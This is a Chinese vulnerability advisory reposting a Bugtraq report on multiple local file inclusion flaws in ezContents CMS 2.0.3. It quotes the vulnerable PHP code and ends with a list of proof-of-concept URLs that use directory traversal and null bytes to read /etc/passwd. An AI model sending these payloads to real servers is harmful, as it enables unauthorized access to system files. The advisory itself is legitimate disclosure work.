首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
漏洞公告 :: 最新漏洞公告

ezContents CMS多个本地文件包含漏洞


http://www.gipsky.com/
ezContents CMS多个本地文件包含漏洞

发布日期:2008-08-25

更新日期:2008-08-26



受影响系统:



VisualShapers ezContents 2.0.3



描述:BUGTRAQ ID: 30821



ezContents是一款开放源代码内容管理系统。







ezContents的多个脚本没有正确地验证输入参数,远程攻击者可以通过包含本地任意资源导致执行任意代码。







1. /module.php脚本本地文件包含漏洞







32-42行和141-145行中的漏洞代码



--------------------------



#################################################







$GLOBALS["rootdp"] = %26#39;./%26#39;;



require_once ($GLOBALS["rootdp"]."include/config.php");



require_once ($GLOBALS["rootdp"]."include/db.php");



require_once ($GLOBALS["rootdp"]."include/session.php");



include_once ($GLOBALS["rootdp"].$GLOBALS["modules_home"]."modfunctions.php");











if [1] %26amp;%26amp; (isset($HTTP_POST_VARS["ezSID"]))) \



$HTTP_GET_VARS["ezSID"] = $HTTP_POST_VARS["ezSID"]; if \



[2] %26amp;%26amp; (isset($HTTP_POST_VARS["link"]))) \



$HTTP_GET_VARS["link"] = $HTTP_POST_VARS["link"];







$HTTP_GET_VARS["link"] = str_replace(%26#39;../%26#39;, %26#39;%26#39;, $HTTP_GET_VARS["link"]);







...







if (isExternalLink ($HTTP_GET_VARS["link"])) {



ECHO %26#39;Remote Code Execution Patch Installed on this implementation of \



ezContents%26#39;; } else {



include($GLOBALS["rootdp"].$HTTP_GET_VARS["link"]);



}







#################################################







/include/functions.php脚本中的isExternalLink()函数用于检查远程包含尝试。







768-779行



-------------------



#################################################







function isExternalLink ($linkref)



{



if ( (substr($linkref,0,5) == %26#39;http:%26#39;) || (substr($linkref,0,6) == \



%26#39;https:%26#39;) ||



(substr($linkref,0,5) == %26#39;file:%26#39;) || \



(substr($linkref,0,4) == %26#39;ftp:%26#39;) ||



(substr($linkref,0,7) == %26#39;gopher:%26#39;) || (substr($linkref,0,7) == \



%26#39;mailto:%26#39;) ||



(substr($linkref,0,5) == %26#39;news:%26#39;) || \



(substr($linkref,0,7) == %26#39;telnet:%26#39;) || (substr($linkref,0,5) == %26#39;wais:%26#39;) ) {



return True;



} else {



return False;



}



} // isExternalLink







#################################################







2. /modules/diary/showdiary.php、/modules/diary/showeventlist.php、/modules/gallery/showgallery.php和/modules/reviews/showreviews.php脚本中的本地文件包含







成功攻击要求打开了register_globals。







showdiary.php文件32-45行



--------------------------------



#################################################







global $HTTP_SERVER_VARS;



if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == %26#39;control.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == %26#39;module.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == %26#39;showcontents.php%26#39;) ) {



require_once(%26#39;./modules/moduleSec.php%26#39;);



} else {



require_once(%26#39;../moduleSec.php%26#39;);



}







$GLOBALS["ModuleName"] = %26#39;diary%26#39;;







if (!isset($GLOBALS["gsLanguage"])) { Header("Location: \



".$GLOBALS["rootdp"]."module.php?link=".$GLOBALS["modules_home"].$GLOBALS["ModuleRef"] \



."/showdiary.php"); } include_once \



($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php"); include_once \



($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");







#################################################







/modules/moduleSec.php脚本用于检查包含尝试。







#################################################







function moduleExternalLink ($linkref)



{



if ($linkref != %26#39;%26#39;) {



if ( (substr($linkref,0,5) == %26#39;http:%26#39;) || \



(substr($linkref,0,6) == %26#39;https:%26#39;) ||



(substr($linkref,0,5) == %26#39;file:%26#39;) || \



(substr($linkref,0,4) == %26#39;ftp:%26#39;) ||



(substr($linkref,0,7) == %26#39;gopher:%26#39;) || \



(substr($linkref,0,7) == %26#39;mailto:%26#39;) ||



(substr($linkref,0,5) == %26#39;news:%26#39;) || \



(substr($linkref,0,7) == %26#39;telnet:%26#39;) || (substr($linkref,0,5) == %26#39;wais:%26#39;) ) {



return True;



} else {



return False;



}



} else {



return False;



}



} // moduleExternalLink











if (!(isset($GLOBALS["rootdp"]))) {



ECHO %26#39;Remote Code Execution Patch Installed on this implementation of \



ezContents%26#39;; DIE;



}



if ( (moduleExternalLink($GLOBALS["rootdp"])) || \



(moduleExternalLink($GLOBALS["modfiledir"])) ||



(moduleExternalLink($GLOBALS["modules_home"])) || \



(moduleExternalLink($GLOBALS["admin_home"])) || \



(moduleExternalLink($GLOBALS["language_home"])) ) {



ECHO %26#39;Remote Code Execution Patch Installed on this implementation of \



ezContents%26#39;; DIE;



}







#################################################







3. /modules/diary/showdiarydetail.php、/modules/gallery/showgallerydetails.php、/modules/reviews/showreviewsdetails.php和/modules/news/shownewsdetails.php脚本中的本地文件包含







成功攻击要求打开了register_globals。







showdiarydetail.php文件32-46行



--------------------------------------



#################################################







global $HTTP_SERVER_VARS;



if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == %26#39;control.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == %26#39;module.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == %26#39;showcontents.php%26#39;) ) {



require_once(%26#39;./modules/moduleSec.php%26#39;);



} else {



require_once(%26#39;../moduleSec.php%26#39;);



}







$GLOBALS["ModuleName"] = %26#39;diary%26#39;;







include_once ($GLOBALS["admin_home"]."compile.php");







include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");



include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");







#################################################







4. /modules/diary/submit_diary.php、/modules/gallery/submit_gallery.php、/modules/guestbook/submit_guestbook.php、/modules/reviews/submit_reviews.php和/modules/news/submit_news.php脚本中的本地文件包含







成功攻击要求打开了register_globals。







submit_diary.php文件32-51行



-----------------------------------



#################################################







global $HTTP_SERVER_VARS;



if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == %26#39;control.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == %26#39;module.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == %26#39;showcontents.php%26#39;) ) {



require_once(%26#39;./modules/moduleSec.php%26#39;);



} else {



require_once(%26#39;../moduleSec.php%26#39;);



}







// Localisation variables (used for default values)



// Change these to suit your site preferences



//



$expiryperiod = %26#39;m%26#39;; // Time period to calculate the banner expiry \



date (based on today%26#39;s date) $expirynumber = 1;











$GLOBALS["ModuleName"] = %26#39;diary%26#39;;







include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");



include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");







#################################################







5. /modules/news/archivednews_summary.php、/modules/news/news_summary.php文件中的本地文件包含







成功攻击要求打开了register_globals。







news_summary.php文件的32-41行



-----------------------------------



#################################################







global $HTTP_SERVER_VARS;



if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == %26#39;control.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == %26#39;module.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == %26#39;showcontents.php%26#39;) ) {



require_once(%26#39;./modules/moduleSec.php%26#39;);



} else {



require_once(%26#39;../moduleSec.php%26#39;);



}







include_once ($GLOBALS["admin_home"]."compile.php");







#################################################







6. /modules/diary/inlineeventlist.php、/modules/news/inlinenews.php文件中的本地文件包含







成功攻击要求打开了register_globals。







inlinenews.php文件的32-52行



---------------------------------



#################################################







global $HTTP_SERVER_VARS;



if ( (substr($HTTP_SERVER_VARS["PHP_SELF"],-11) == %26#39;control.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-10) == %26#39;module.php%26#39;) ||



(substr($HTTP_SERVER_VARS["PHP_SELF"],-16) == %26#39;showcontents.php%26#39;) ) {



require_once(%26#39;./modules/moduleSec.php%26#39;);



} else {



require_once(%26#39;../moduleSec.php%26#39;);



}







global $EZ_SESSION_VARS;







$GLOBALS["ModuleName"] = %26#39;news%26#39;;







$linkref = $nLink;



$chainlink = explode(%26#39;/%26#39;,$linkref);



$modfilename = array_pop($chainlink);



$GLOBALS["modfiledir"] = implode(%26#39;/%26#39;,$chainlink);



include($GLOBALS["modfiledir"]."/moduleref.php");







include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_admin.php");



include_once ($GLOBALS["language_home"].$GLOBALS["gsLanguage"]."/lang_main.php");







#################################################



<*来源:Digital Security Research Group



链接:http://marc.info/?l=bugtraq%26amp;m=121968090815635%26amp;w=2

*>



测试方法:<font color='#FF0000'><p align='center'>警 告



以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!</p></font>http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG%26amp;nLink=../../../../../../../../../../../../../etc/passwd%00/



http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG%26amp;gsLanguage=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/news/inlinenews.php?rootdp=DSecRG%26amp;language_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/news/news_summary.php?rootdp=DSecRG%26amp;admin_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG%26amp;gsLanguage=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/submit_diary.php?rootdp=DSecRG%26amp;language_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG%26amp;admin_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG%26amp;gsLanguage=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/showdiarydetail.php?rootdp=DSecRG%26amp;language_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG%26amp;gsLanguage=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/modules/diary/showdiary.php?rootdp=DSecRG%26amp;gsLanguage=DSecRG%26amp;language_home=../../../../../../../../../../../../../etc/passwd%00



http://[server]/[installdir]/module.php?link=....//....//....//....//....//....//....//....//....//....//....//....//....//etc/passwd



建议:厂商补丁:



VisualShapers

-------------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:







http://www.visualshapers.com/
附注
  1. !isset($HTTP_GET_VARS["ezSID"]
  2. !isset($HTTP_GET_VARS["link"]
<< Pluck CMS多个本地文件包含漏洞 Novell iPrint客户端ActiveX控件多个安全漏洞 >>
评分
10987654321
API:
gipsky.com & 安信网络

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8